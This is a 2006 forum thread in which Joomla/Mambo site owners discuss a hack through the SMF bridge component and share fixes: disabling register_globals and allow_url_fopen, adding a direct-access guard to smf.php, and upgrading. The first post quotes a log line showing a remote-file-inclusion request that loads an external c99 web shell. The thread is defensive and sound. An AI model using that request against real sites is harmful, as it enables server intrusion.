Our Joomla website has just been hacked through SMF component by the turkish eno7 hacker:
85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.xxxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......
What are the practical steps to restore the website.
And then what are the practical steps to prevent it from recurring
Thank you
Anna
Hi Anna,
I had the same IP attack and hack my Mambo site with SMF bridge. I've taken my site down until I also get more details on resolving this. I've also contacted 1&1 who hosts allianceforvirtualbiz.com to request the site be suspended as they are enabling the hacker to function by providing the file.
My webhost is going to block both 85.108.125.96 and 82.165.193.254 at the network level switch before it even hits the servers to ensure this isn't able to reach our network again.
I hope someone from SMF can help.
Thanks.
I found out more details that would pertain to Mambo/Joomla for this hack attempt:
http://forum.mamboserver.com/showthread.php?p=378826
Did you have register_globals set to On or is it set to on for your server? If so, put a php.ini file on your account and set it to Off. I thought I had mine set to off, but I guess there were 2 php.ini files on my server and it was going off the other one :(
Additionally, I'd follow reply #6 and put that code noted in that post into the file for your smf component. Once I re-install mine from backup tonight, I'll give details on what file it would be (I imagine smf.php though as that's the file that was hit in the component).
Thank you Miraenda
My configuration.php is gone, empty... I'm trying to locate one in my back up files & I'm not sure which one is the correct one.
Anna
Ive got hit by this also and had to remove integration of SMF rc1.2 from my joomla site.
My logs were rotated before I could get to how they uploaded it - but I found a url very similar to the above one in my webalizer :)
Were you running Joomla 1.0.8? as that has known vulnerabilities - Im thinking that was the reason.
Hi Tony,
The issue is having register_globals set to ON. If you do, you need to change it to off right now.
Next, you need to input in smf.php at components/com_smf the following code:
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');
This will prevent by both this happening again. It isn't the version that's the issue, it's that the component bridge is allowing the /components/com_smf/smf.php?mosConfig_absolute_path=http://someurl/somebadfile.txt to be passed. Any component you have that allows that is going to leave you open to attack.
I posted about it at this url on my site that's now back:
http://ratingbar.com/component/option,com_smf/Itemid,26/topic,100.0/
Thanks.
Thanks for the info Miraenda,
Tony
You're very welcome Tony :)
Actually, part of the problem is also having allow_url_fopen set to On.
This has been secured in bridge 1.1.5a. I suggest upgrading:
http://www.simplemachines.org/community/index.php?topic=97649.0
I was attempted to be hacked 3 times after I made the 2 changes (register_globals to off and the code inserted into smf.php file), and they haven't been able to get through. Does the new bridge have this code in smf.php now or not?
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');
If it does not, can this please be added to the newest bridge?
Yes, it is there.
Cool, thanks Orstio :D
Thank you Orstio, the above bridge is for SMF 1.1 RC2 only, I have RC1. What should I do in my case? Is bridge 3.19a equally secure?
Thanks,
Anna
No, in 3.19a, you will need to add the line of code Miraenda posted above.
I just went through all files contained in Bridge 3.19a and I'm not able to locate
smf.php which according to the instructions suppose to go into components/com_smf.
LainaaThese goes in components/com_smf/:
smf.php
I'm obviously not looking into the right folders. Which folder is that file in?
Thank you Orstio
Anna
In 3.19a it will be in your Step 2 folder, inside the com_smf.zip.
You are the most patient person Orstio I met in years... ;) Ever?
Thank you!!! Found it, added the 'security' lines, put it in and it works!!! 8)
What a day it had been!
Anna
I'm happy to report that I had numerous attempts of the hacking since yesterday (same as Miraenda) and they were all unsuccessful. ;D
Thank you again
Anna
Great to hear Anna :D
Good stuff, thanks! :D
Glad it's helpful myuption. Being hacked really hurts :(
Lainaus käyttäjältä: Miraenda - heinäkuu 22, 2006, 12:18:05 IP
Glad it's helpful myuption. Being hacked really hurts :(
I know, i has happened to me also :(